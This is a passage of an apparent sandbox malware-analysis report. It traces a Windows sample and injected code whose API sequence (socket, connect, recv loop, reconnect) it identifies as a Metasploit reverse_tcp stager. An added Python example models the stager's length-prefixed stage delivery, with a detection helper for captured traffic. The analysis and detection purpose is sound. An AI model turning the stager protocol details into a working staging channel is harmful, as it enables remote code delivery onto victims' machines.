                                                                • Part of subcall function 0000000140012210: TlsGetValue.KERNEL32 ref: 0000000140012223
                                                                • Part of subcall function 0000000140012210: HeapAlloc.KERNEL32 ref: 0000000140012266
                                                              • HeapDestroy.KERNEL32 ref: 000000014000124C
                                                              • ExitProcess.KERNEL32 ref: 0000000140001258
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Heap$Alloc$Free$CreateErrorExceptionHandlerLastValueVectoredmemset$CommonControlsDestroyExitInitInitializeProcessRemove
                                                              • String ID: 0w
                                                              • API String ID: 1207063833-4020514967

                                                              Similarity
                                                              • API ID: FileWrite$FreeHeap
                                                              • String ID:
                                                              • API String ID: 74418370-0

                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocHeap
                                                              • String ID:
                                                              • API String ID: 3475569825-0

                                                              Similarity
                                                              • API ID: CreateDirectorywcslenwcsncpy
                                                              • String ID:
                                                              • API String ID: 961886536-0

                                                              Similarity
                                                              • API ID: CommonControlsInitInitializememset
                                                              • String ID:
                                                              • API String ID: 2179856907-0

                                                              Similarity
                                                              • API ID: AllocHeap$Value
                                                              • String ID:
                                                              • API String ID: 3898337583-0

                                                              Similarity
                                                              • API ID: CodeExitProcess
                                                              • String ID: open
                                                              • API String ID: 3861947596-2758837156

                                                              APIs
                                                                • Part of subcall function 00000001400123E0: TlsGetValue.KERNEL32 ref: 00000001400123F8
                                                              • RemoveDirectoryW.KERNEL32(00000000,?,0000000140003010), ref: 000000014000299C
                                                              • RemoveDirectoryW.KERNEL32(?,0000000140003010), ref: 00000001400029A8
                                                                • Part of subcall function 0000000140007170: WaitForSingleObject.KERNEL32 ref: 0000000140007187
                                                                • Part of subcall function 000000014000720C: TerminateThread.KERNEL32 ref: 0000000140007223
                                                                • Part of subcall function 000000014000720C: EnterCriticalSection.KERNEL32 ref: 0000000140007230
                                                              Similarity
                                                              • API ID: DirectoryRemove$CriticalEnterObjectSectionSingleTerminateThreadValueWait
                                                              • String ID:
                                                              • API String ID: 547990026-0

                                                              Similarity
                                                              • API ID: ExceptionHandlerVectored$Remove
                                                              • String ID:
                                                              • API String ID: 3670940754-0

                                                              Similarity
                                                              • API ID: File$AttributesDelete
                                                              • String ID:
                                                              • API String ID: 2910425767-0
                                                              Similarity
                                                              • API ID: AllocHeap$CreateValue
                                                              • String ID:
                                                              • API String ID: 493873155-0
                                                              Similarity
                                                              • API ID: DestroyFreeHeap
                                                              • String ID:
                                                              • API String ID: 3293292866-0
                                                              Similarity
                                                              • API ID: Heap$AllocFreememset
                                                              • String ID:
                                                              • API String ID: 3063399779-0
                                                              Similarity
                                                              • API ID: AllocHeapValue
                                                              • String ID:
                                                              • API String ID: 2362848668-0
                                                              Similarity
                                                              • API ID: CloseFreeHandleHeap
                                                              • String ID:
                                                              • API String ID: 1642312469-0
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              Similarity
                                                              • API ID: EnvironmentVariable
                                                              • String ID:
                                                              • API String ID: 1431749950-0
                                                              Similarity
                                                              • API ID: Free
                                                              • String ID:
                                                              • API String ID: 3978063606-0
                                                              Similarity
                                                              • API ID: CurrentDirectory
                                                              • String ID:
                                                              • API String ID: 1611563598-0
                                                              Similarity
                                                              • API ID: CreateHeap
                                                              • String ID:
                                                              • API String ID: 10892065-0
                                                              Similarity
                                                              • API ID: ExceptionHandlerRemoveVectored
                                                              • String ID:
                                                              • API String ID: 1340492425-0
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID:
                                                              • API String ID: 3702945584-0
                                                              Similarity
                                                              • API ID: Window$Message$CreateHeapSend$Freewcslen$Accelerator$LoadMetricsSystemTableTranslate$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundIconLongObjectRegisterStockwcscpy
                                                              • String ID: BUTTON$C$EDIT$P$STATIC$n
                                                              • API String ID: 9748049-1690119102
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $header crc mismatch$unknown compression method$unknown header flags set
                                                              • API String ID: 0-4074041902
                                                              Similarity
                                                              • API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskmemsetwcsncpy
                                                              • String ID: P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
                                                              • API String ID: 217932011-4219398408
Similarity
• API ID: FreeLibrarywcscatwcslen$AddressAllocHeapLoadProcTaskValuewcscpy
• String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
• API String ID: 1740785346-287042676
Similarity
• API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
• String ID:
• API String ID: 298514914-0
Similarity
• API ID: _wcsdupfreewcsncpy$Value
• String ID:
• API String ID: 1554701960-0
Similarity
• API ID: Library$AddressFreeLoadProcSleep
• String ID: 0w$InitOnceExecuteOnce$Kernel32.dll
• API String ID: 938261879-4269124590
Similarity
• API ID: Window$ClassDestroyEnableProcUnregister
• String ID:
• API String ID: 1570244450-0
Similarity
• API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
• String ID:
• API String ID: 3383493704-0
Similarity
• API ID: CriticalSection$AllocHeap$EnterInitializeLeave
• String ID: 0w
• API String ID: 2544007295-4020514967
Similarity
• API ID: Window$CurrentThread$EnableEnumWindows
• String ID:
• API String ID: 2527101397-0
Similarity
• API ID: AllocValue$Heap
• String ID:
• API String ID: 2472784365-0
Similarity
• API ID: CriticalSection$CloseCreateEnterHandleLeaveObjectSingleThreadWait
• String ID:
• API String ID: 458812214-0
Similarity
• API ID: CriticalSection$FreeHeap$DeleteEnterLeave
• String ID:
• API String ID: 3171405041-0
Similarity
• API ID: memset$memmove
• String ID:
• API String ID: 3527438329-0
Similarity
• API ID:
• String ID: $ $header crc mismatch
• API String ID: 0-4092041874
Similarity
• API ID: Heapwcsncpy$AllocFree
• String ID:
• API String ID: 1479455602-0
Similarity
• API ID: memmove
• String ID: $ $invalid stored block lengths
• API String ID: 2162964266-1718185709
                                                              • Opcode ID: 5a154506d4633e528a7a17bae092f7a518f978704b3b8509104772513ba27d3c
                                                              • Instruction ID: 754f218cd566fbce8dd602483dcb0b6cf2df6dd41c0e80f26ad42ee7a9f80f3a
                                                              • Opcode Fuzzy Hash: 5a154506d4633e528a7a17bae092f7a518f978704b3b8509104772513ba27d3c
                                                              • Instruction Fuzzy Hash: 3A417B766006508BE7268F27D5887AE3BA0F3087C8F155119FF8A4BBA4C776D8A1CB40
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: EntryFunctionLookup$UnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3286588846-0
                                                              • Opcode ID: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
                                                              • Instruction ID: 3ebace1c390976f506d0f99ca18ed721a427f0b26ede3763bfd5663c46823d1b
                                                              • Opcode Fuzzy Hash: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
                                                              • Instruction Fuzzy Hash: 48512E66A15FC481EA61CB29E5453ED63A0FB9DB84F09A215DF8C13756EF34D2D4C700
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CharLower
                                                              • String ID:
                                                              • API String ID: 1615517891-0
                                                              • Opcode ID: c79849e46724dc2abb30ea88d6992f20c8495c80adfb737506759087bbbff476
                                                              • Instruction ID: 89447f37e157e5f910190f26039f07b44efb98263a832e051549732566d91b47
                                                              • Opcode Fuzzy Hash: c79849e46724dc2abb30ea88d6992f20c8495c80adfb737506759087bbbff476
                                                              • Instruction Fuzzy Hash: BB2181766006A092EA66EF13A8047BA76A0F748BF5F5A4211FFD5072E0DB35C495D710
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWidemalloc
                                                              • String ID:
                                                              • API String ID: 2735977093-0
                                                              • Opcode ID: 0f974c86f1a7e361068b693f653777688ae97df7ee1888e934fdd283249f1d8a
                                                              • Instruction ID: 84a502ef329111f45b75735ee98b05bbb8abde518fb530cc481733cdeaf2302d
                                                              • Opcode Fuzzy Hash: 0f974c86f1a7e361068b693f653777688ae97df7ee1888e934fdd283249f1d8a
                                                              • Instruction Fuzzy Hash: 76216532608B8086D725CF56B44079AB7A5F7887D4F088325FF9917BA9DF3DC5529700
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FolderFreeFromListLocationPathTaskwcslen
                                                              • String ID:
                                                              • API String ID: 4012708801-0
                                                              • Opcode ID: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
                                                              • Instruction ID: 658b845125df41e3d707b834e255611bbe4f6e958313e82604e3ea1cd6ed1d71
                                                              • Opcode Fuzzy Hash: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
                                                              • Instruction Fuzzy Hash: 50016972314A5092E7219B26A5807AAA3B4FB88BC0F548026EB4987774DF3AC8528300
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocCriticalHeapSection$EnterLeave
                                                              • String ID:
                                                              • API String ID: 830345296-0
                                                              • Opcode ID: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
                                                              • Instruction ID: a4d5f086a96e389f2db612197d0023b8b07f868559dabceebcf4944cd54701ff
                                                              • Opcode Fuzzy Hash: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
                                                              • Instruction Fuzzy Hash: 47513A72601B44C7EB5ACF26E18039873A5F78CF88F188526EB4E4B766DB35D4A1C750
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocHeapmemsetwcscpywcslen
                                                              • String ID:
                                                              • API String ID: 1807340688-0
                                                              • Opcode ID: d18a2de789b4fced0d5c5c7af7bdf7f4ac513c7a43bb144637d931b1f82fec87
                                                              • Instruction ID: 2291175711b854bc4f74fb4265d0f1bd771c1a5bff4f4550b8324bf1b1149364
                                                              • Opcode Fuzzy Hash: d18a2de789b4fced0d5c5c7af7bdf7f4ac513c7a43bb144637d931b1f82fec87
                                                              • Instruction Fuzzy Hash: DA3129B1605B4081EB16EF27A5443ECB7A1EB8CFD4F588126AF4D0B7AADF39C4518351
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Heap$Free$Alloc
                                                              • String ID:
                                                              • API String ID: 3901518246-0
                                                              • Opcode ID: bb233ee99204156f9138ca45554c95eaa539cc3d4f2a2cc436c5bedac0f56ea0
                                                              • Instruction ID: 7f7b652e9f7b58be947c1c734e7a82da3d99598ff0fb71c13e03353473737a2d
                                                              • Opcode Fuzzy Hash: bb233ee99204156f9138ca45554c95eaa539cc3d4f2a2cc436c5bedac0f56ea0
                                                              • Instruction Fuzzy Hash: 063142B2211B409BE702DF13EA807A937A4F78CBD0F448429EB4847B65DF79E4A6C740
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocCriticalHeapSection$EnterLeave
                                                              • String ID:
                                                              • API String ID: 830345296-0
                                                              • Opcode ID: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
                                                              • Instruction ID: 37e1212d5150fef44f5374ae18cee5b2af0a62904f946070966fd9e2c84ce28f
                                                              • Opcode Fuzzy Hash: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
                                                              • Instruction Fuzzy Hash: 7B210872615B4482EB198F66E5403EC6361F78CFD4F548612EB6E4B7AACF38C552C350
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWidemalloc
                                                              • String ID:
                                                              • API String ID: 2735977093-0
                                                              • Opcode ID: 340bc02c17e4a8e241ea194c94348a7795e75439271f92f6ed283f878bcb1d35
                                                              • Instruction ID: 61c3440d716b3c64d08436ee48054615140ae5ecb8d8084460387f48d4e9dd56
                                                              • Opcode Fuzzy Hash: 340bc02c17e4a8e241ea194c94348a7795e75439271f92f6ed283f878bcb1d35
                                                              • Instruction Fuzzy Hash: BB11C13260878082EB25CF26B41076AB7A4FB89BE4F140328EF9D57BE5DF39C0118704
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CriticalFreeHeapSection$EnterLeave
                                                              • String ID:
                                                              • API String ID: 1298188129-0
                                                              • Opcode ID: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
                                                              • Instruction ID: 5186432533761a1e63310800083548d259c5d54e134ea9fda60ce401f62d664d
                                                              • Opcode Fuzzy Hash: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
                                                              • Instruction Fuzzy Hash: 76114C76600B4082EB5A9F53E5943E823A0FB9CBC5F4C8416EB091B6A7DF3AC4A5C300
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FreeHeap$CriticalSection$EnterLeavememset
                                                              • String ID:
                                                              • API String ID: 4254243056-0
                                                              • Opcode ID: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
                                                              • Instruction ID: bd40ed23f28c7418c8be6727045953eb2e8c2f29468db0d1e18b21a18f306043
                                                              • Opcode Fuzzy Hash: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
                                                              • Instruction Fuzzy Hash: FD01C8B5600B8492EB06EB63E9903E923A1FBCDBD0F488416AF0D1B776CF39D4518740

                                                               Execution Graph

                                                               Execution Coverage:42.8%
                                                               Dynamic/Decrypted Code Coverage:100%
                                                               Signature Coverage:0%
                                                               Total number of Nodes:10
                                                               Total number of Limit Nodes:3
                                                               Nodes (id: address [API]):
                                                               • 34: 690000
                                                               • 36: 690006
                                                               • 37: 690095
                                                               • 38: 6900aa
                                                               • 39: 6900bc WSASocketA
                                                               • 40: 6900d8 connect
                                                               • 41: 6900f1 recv
                                                               • 42: 690139 closesocket
                                                               • 43: 6900e7
                                                               • 44: 690157
                                                               Edges: 34->37, 36->36, 37->38, 38->39, 39->40, 40->41, 40->43, 41->42, 41->43, 42->39, 42->43, 43->40, 43->41, 43->42, 43->44, 44->36

                                                               Callgraph

                                                               • Function_00690000 -> Function_00690095

                                                               Control-flow Graph

                                                               Basic blocks (id: address range [API]):
                                                               • 0: 690095-6900ba
                                                               • 3: 6900bc-6900d7 WSASocketA
                                                               • 4: 6900d8-6900e5 connect
                                                               • 5: 6900f1-690101 recv
                                                               • 6: 6900e7-6900ea
                                                               • 7: 6900ec call 690158
                                                               • 8: 690139-690146 closesocket
                                                               • 9: 690103-690117
                                                               • 10: 69014c
                                                               • 13: 690118-690127
                                                               • 15: 690129-690132
                                                               • 16: 690151-690155
                                                               • 17: 690157
                                                               Edges: 0->3, 3->4, 4->5, 4->6, 5->8, 5->9, 6->4, 6->7, 7->5, 8->3, 8->10, 9->13, 10->7, 13->15, 13->16, 15->8, 16->13, 16->17
                                                              APIs
                                                              • WSASocketA.WS2_32(E0DF0FEA,00000002,00000001,00000000,00000000,00000000,00000000,61040002,17DDB993,0000000A,?,?,5F327377,00003233), ref: 006900D5
                                                              • connect.WS2_32(6174A599,?,?,00000010,?,?,5F327377,00003233), ref: 006900E1
                                                              • recv.WS2_32(5FC8D902,?,?,00000004,00000000,?,?,00000010,?,?,5F327377,00003233), ref: 006900FC
                                                              • closesocket.WS2_32(614D6E75,?,?,?,00000004,00000000,?,?,00000010,?,?,5F327377,00003233), ref: 0069013F
                                                              Memory Dump Source
                                                              • Source File: 0000001B.00000002.2895931053.0000000000690000.00000040.00001000.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_27_2_690000_reddit.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Socketclosesocketconnectrecv
                                                              • String ID:
                                                              • API String ID: 2083937939-0
                                                              • Opcode ID: 84d56f8600d23d128e6293084ea8b9ff6e5c57e2ecd32b084406f59f59bbaeb3
                                                              • Instruction ID: 327eec653f23560a16df2192c97ad8ff14f98007befe078a999dd95378402dd5
                                                              • Opcode Fuzzy Hash: 84d56f8600d23d128e6293084ea8b9ff6e5c57e2ecd32b084406f59f59bbaeb3
                                                              • Instruction Fuzzy Hash: A711C0B168029C3EF93022A29C47FBB291CCF42BA4F100025BB45FA5C1C8829C4481FA

                                                               Execution Graph

                                                               Execution Coverage:42.8%
                                                               Dynamic/Decrypted Code Coverage:100%
                                                               Signature Coverage:0%
                                                               Total number of Nodes:9
                                                               Total number of Limit Nodes:3
                                                               Nodes (id: address [API]):
                                                               • 34: 4b0000
                                                               • 37: 4b0095
                                                               • 38: 4b00aa
                                                               • 39: 4b00bc WSASocketA
                                                               • 40: 4b00d8 connect
                                                               • 41: 4b00f1 recv
                                                               • 42: 4b0139 closesocket
                                                               • 43: 4b00e7
                                                               • 44: 4b0006
                                                               Edges: 34->37, 37->38, 38->39, 39->40, 40->41, 40->43, 41->42, 41->43, 42->39, 42->43, 43->40, 43->41, 43->42, 43->44

                                                               Callgraph

                                                               • Function_004B0000 -> Function_004B0095

                                                               Control-flow Graph

                                                               Basic blocks (id: address range [API]):
                                                               • 0: 4b0095-4b00ba
                                                               • 3: 4b00bc-4b00d7 WSASocketA
                                                               • 4: 4b00d8-4b00e5 connect
                                                               • 5: 4b00f1-4b0101 recv
                                                               • 6: 4b00e7-4b00ea
                                                               • 7: 4b00ec call 4b0158
                                                               • 8: 4b0139-4b0146 closesocket
                                                               • 9: 4b0103-4b0117
                                                               • 10: 4b014c
                                                               • 13: 4b0118-4b0127
                                                               • 15: 4b0129-4b0132
                                                               • 16: 4b0151-4b0155
                                                               • 17: 4b0157
                                                               Edges: 0->3, 3->4, 4->5, 4->6, 5->8, 5->9, 6->4, 6->7, 7->5, 8->3, 8->10, 9->13, 10->7, 13->15, 13->16, 15->8, 16->13, 16->17
                                                              APIs
                                                              • WSASocketA.WS2_32(E0DF0FEA,00000002,00000001,00000000,00000000,00000000,00000000,61040002,17DDB993,0000000A,?,?,5F327377,00003233), ref: 004B00D5
                                                              • connect.WS2_32(6174A599,?,?,00000010,?,?,5F327377,00003233), ref: 004B00E1
                                                              • recv.WS2_32(5FC8D902,?,?,00000004,00000000,?,?,00000010,?,?,5F327377,00003233), ref: 004B00FC
                                                              • closesocket.WS2_32(614D6E75,?,?,?,00000004,00000000,?,?,00000010,?,?,5F327377,00003233), ref: 004B013F
                                                              Memory Dump Source
                                                              • Source File: 0000001C.00000002.2895801436.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_28_2_4b0000_reddit.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Socketclosesocketconnectrecv
                                                              • String ID:
                                                              • API String ID: 2083937939-0
                                                              • Opcode ID: 84d56f8600d23d128e6293084ea8b9ff6e5c57e2ecd32b084406f59f59bbaeb3
                                                              • Instruction ID: 4986a570a3823d31c4fb244b7cc399561d3bb85c5cc1dab5fb55dd75d18e226f
                                                              • Opcode Fuzzy Hash: 84d56f8600d23d128e6293084ea8b9ff6e5c57e2ecd32b084406f59f59bbaeb3
                                                              • Instruction Fuzzy Hash: 5F116DB16802987EF5302666AC47FFB691CCB42BA9F104426BB45EA1C1C9969C4581FE
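The API sequence of this function (WSASocketA, connect, a recv with a 4-byte length, a receive loop, closesocket, and the back-edge from closesocket to WSASocketA) has the shape of the Metasploit reverse_tcp stager that the Yara signature in this report names: after connecting, the stager reads a 4-byte little-endian stage length, then loops on recv until that many bytes have arrived, and reconnects when the socket drops. The following is an added example, not code from this report or from Metasploit, that models both sides of that framing so the recv(…, 4) and the loop can be read against a captured stream. The stage bytes are constructed filler (not a payload), the size bounds MIN_STAGE_LEN and MAX_STAGE_LEN are assumptions introduced here (the real stager has no such check), and io.BytesIO stands in for the socket so it runs offline.

```python
import io
import struct

# Constructed filler standing in for a delivered stage (NOT a real payload): 768 bytes.
SAMPLE_STAGE = bytes(range(256)) * 3

MAX_STAGE_LEN = 16 * 1024 * 1024   # assumed sanity bound; the original stager has none
MIN_STAGE_LEN = 64                 # assumed: a stage smaller than this is not plausible


def frame_stage(stage: bytes) -> bytes:
    """Handler side: the stage is sent as a 4-byte little-endian length followed by the body."""
    return struct.pack("<I", len(stage)) + stage


def recv_exact(sock, n: int, chunk: int = 256) -> bytes:
    """Read until n bytes have arrived or the peer closes, the way the stager's recv loop does.

    `sock` only needs a .read(size) method, so io.BytesIO can stand in for a real socket."""
    buf = bytearray()
    while len(buf) < n:
        part = sock.read(min(chunk, n - len(buf)))
        if not part:            # peer closed: short delivery
            break
        buf.extend(part)
    return bytes(buf)


def read_stage(sock):
    """Stager side: the 4-byte recv seen in the CFG, then the body loop.

    Returns (declared_length, body, complete) or None when no usable length header arrived."""
    header = recv_exact(sock, 4)
    if len(header) < 4:
        return None
    (length,) = struct.unpack("<I", header)
    if not MIN_STAGE_LEN <= length <= MAX_STAGE_LEN:
        return None
    body = recv_exact(sock, length)
    return length, body, len(body) == length


def read_stage_from_bytes(data: bytes):
    """Convenience wrapper: run read_stage over an in-memory byte stream."""
    return read_stage(io.BytesIO(data))


def extract_delivered_stage(server_to_client: bytes):
    """Check a captured handler->implant byte stream (e.g. a reassembled TCP stream from a pcap)
    for reverse_tcp framing: a plausible length DWORD with at least that many bytes following.
    Later traffic on the same connection (after the stage) is allowed, hence '>=' rather than '=='.
    Returns (declared_length, stage_bytes) or None."""
    if len(server_to_client) < 4:
        return None
    (length,) = struct.unpack("<I", server_to_client[:4])
    if not MIN_STAGE_LEN <= length <= MAX_STAGE_LEN:
        return None
    if len(server_to_client) - 4 < length:
        return None
    return length, server_to_client[4:4 + length]


if __name__ == "__main__":
    wire = frame_stage(SAMPLE_STAGE)
    length, body, complete = read_stage_from_bytes(wire)
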